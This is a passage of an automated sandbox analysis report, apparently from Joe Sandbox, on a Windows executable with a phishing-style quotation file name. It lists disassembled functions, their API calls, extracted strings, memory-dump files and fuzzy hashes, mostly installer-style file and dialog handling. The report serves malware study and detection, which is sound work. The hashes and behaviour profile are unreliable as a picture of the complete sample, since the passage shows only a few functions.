Opcode ID: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
Instruction ID: 030197d704291a410dcd06cfc4277a043b64cd4f667f0077e3e502e998d69d3f
Opcode Fuzzy Hash: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
Instruction Fuzzy Hash: CBA1A0B1900208ABDB11AFA5DD45AAF77B8EF84314F11803BF611B62D1D77C9A418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C2D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe"), ref: 00405C56
lstrcatW.KERNEL32(00424F10,\*.*), ref: 00405C9E
lstrcatW.KERNEL32(?,0040A014), ref: 00405CC1
lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe"), ref: 00405CC7
FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe"), ref: 00405CD7
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D77
FindClose.KERNEL32(00000000), ref: 00405D86

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C3A
"C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe", xrefs: 00405C36
\*.*, xrefs: 00405C98

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3067381105
Opcode ID: 128d61b3f560fb6e88013565bcaa97066b37999ec13de485a1913bcf595dbe87
Instruction ID: aec485693c4c1533f42b9347a66a6bbcb57ea8568fe9c979ecac7928daa7b7f5
Opcode Fuzzy Hash: 128d61b3f560fb6e88013565bcaa97066b37999ec13de485a1913bcf595dbe87
Instruction Fuzzy Hash: 8741D230801A14BADB31BB659D4DAAF7678EF41718F14813FF801B11D5D77C8A829EAE

Uniqueness

Uniqueness Score: -1.00%

Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 39ec8271ecbe68cd688bb189458c102c7666cef281f0bf442c703dc48e606f12
Instruction ID: a06f58704ac02dcae893024ea8a23b5ac4ca5f5a8623c8e138aed3c50dac2e18
Opcode Fuzzy Hash: 39ec8271ecbe68cd688bb189458c102c7666cef281f0bf442c703dc48e606f12
Instruction Fuzzy Hash: 44F05E71A04104AAD711EBE4E9499AEB378EF14314F60057BE101F21D0DBB84D019B2A

Uniqueness

Uniqueness Score: -1.00%

Function 00404F0D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F25
GetDlgItem.USER32(?,00000408), ref: 00404F30
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F7A
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F91
SetWindowLongW.USER32(?,000000FC,0040551A), ref: 00404FAA
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FBE
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FD0
SendMessageW.USER32(?,00001109,00000002), ref: 00404FE6
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FF2
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405004
DeleteObject.GDI32(00000000), ref: 00405007
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405032
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040503E
SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D9
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405109

Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3

SendMessageW.USER32(?,00001132,00000000,?), ref: 0040511D
GetWindowLongW.USER32(?,000000F0), ref: 0040514B
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405159
ShowWindow.USER32(?,00000005), ref: 00405169
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405264
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C9
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DE
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405302
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405322
ImageList_Destroy.COMCTL32(00000000), ref: 00405337
GlobalFree.KERNEL32(00000000), ref: 00405347
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053C0
SendMessageW.USER32(?,00001102,?,?), ref: 00405469
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405478
InvalidateRect.USER32(?,00000000,00000001), ref: 004054A3
ShowWindow.USER32(?,00000000), ref: 004054F1
GetDlgItem.USER32(?,000003FE), ref: 004054FC
ShowWindow.USER32(00000000), ref: 00405503

Strings

N, xrefs: 004051A2
M, xrefs: 004050C1
, xrefs: 004054DB

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
Instruction ID: 467e9106b9ab4b1e9b2d04e68362d71007c986f05034cc4a0cb7dcf353c6e141
Opcode Fuzzy Hash: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
Instruction Fuzzy Hash: 16029B70A00609EFDB20DF95DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040465F Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046FD
GetDlgItem.USER32(?,000003E8), ref: 00404711
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040472E
GetSysColor.USER32(?), ref: 0040473F
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040474D
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040475B
lstrlenW.KERNEL32(?), ref: 00404760
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040476D
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404782
GetDlgItem.USER32(?,0000040A), ref: 004047DB
SendMessageW.USER32(00000000), ref: 004047E2
GetDlgItem.USER32(?,000003E8), ref: 0040480D
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404850
LoadCursorW.USER32(00000000,00007F02), ref: 0040485E
SetCursor.USER32(00000000), ref: 00404861
LoadCursorW.USER32(00000000,00007F00), ref: 0040487A
SetCursor.USER32(00000000), ref: 0040487D
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048AC
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048BE

Strings

: Completed, xrefs: 0040483C
tt, xrefs: 004047BB
N, xrefs: 004047FB

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: : Completed$N$tt
API String ID: 3103080414-3251494710
Opcode ID: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
Instruction ID: fa786ba7610ecb1ae21ae2169d8ef808fc0b2da043ab7544d4c43deaa2774949
Opcode Fuzzy Hash: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
Instruction Fuzzy Hash: 7F61B3B1A00209BFDB10AF64DD85A6A7B79FB84354F00843AFB05B61D0D7B9AD61CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00406167 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406302,?,?), ref: 004061A2
GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061AB

Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8

GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061C8
wsprintfA.USER32 ref: 004061E6
GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406221
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406230
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406268
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062BE
GlobalFree.KERNEL32(00000000), ref: 004062CF
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062D6

Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,00437800,80000000,00000003), ref: 00406015
Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037

Strings

[Rename], xrefs: 00406250, 00406262
%ls=%ls, xrefs: 004061DC

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
Instruction ID: d8f03b5b48010a369f687ed07a259b5d04d98e8e290d987932ab0f9f84d7b5e4
Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
Instruction Fuzzy Hash: 89313230201325BFD6207B659D48F2B3A6CDF41714F12007EBA02F62C2EA7D98218ABD

Uniqueness

Uniqueness Score: -1.00%

Function 004067CF Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
CharNextW.USER32(?,"C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004067D0
"C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe", xrefs: 00406813
*?|<>/":, xrefs: 00406821

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-662958600
Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction ID: 2d41fa7b6770246c30beeceb47eb68b435a53440eacd13368e2f30b8c56315d6
Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction Fuzzy Hash: A511935680121296DB303B14CC44ABB66E8AF54794F52C03FE999732C1E77C5C9296BD

Uniqueness

Uniqueness Score: -1.00%

Function 00404507 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404524
GetSysColor.USER32(00000000), ref: 00404562
SetTextColor.GDI32(?,00000000), ref: 0040456E
SetBkMode.GDI32(?,?), ref: 0040457A
GetSysColor.USER32(?), ref: 0040458D
SetBkColor.GDI32(?,?), ref: 0040459D
DeleteObject.GDI32(?), ref: 004045B7
CreateBrushIndirect.GDI32(?), ref: 004045C1

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: 524417ed32742d4b72cd17798d780815826fd18a7bcb7bb0f1ed1fdd1052d135
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: B22135B1500705AFCB319F78DD08B577BF5AF81714B048A2DEA96A26E0D738D944CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1

Part of subcall function 004060F2: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406108

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D

Strings

9, xrefs: 00402740

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
Instruction ID: 4938fc2aff7960a3a7fedf371d3c64c497049ea43b58312dd80c80f6ae9549af
Opcode Fuzzy Hash: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
Instruction Fuzzy Hash: 5051FB75D0421AABDF249FD4CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58

Uniqueness

Uniqueness Score: -1.00%

Function 00404E5B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E76
GetMessagePos.USER32 ref: 00404E7E
ScreenToClient.USER32(?,?), ref: 00404E98
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EAA
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404ED0

Strings

f, xrefs: 00404EAC

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
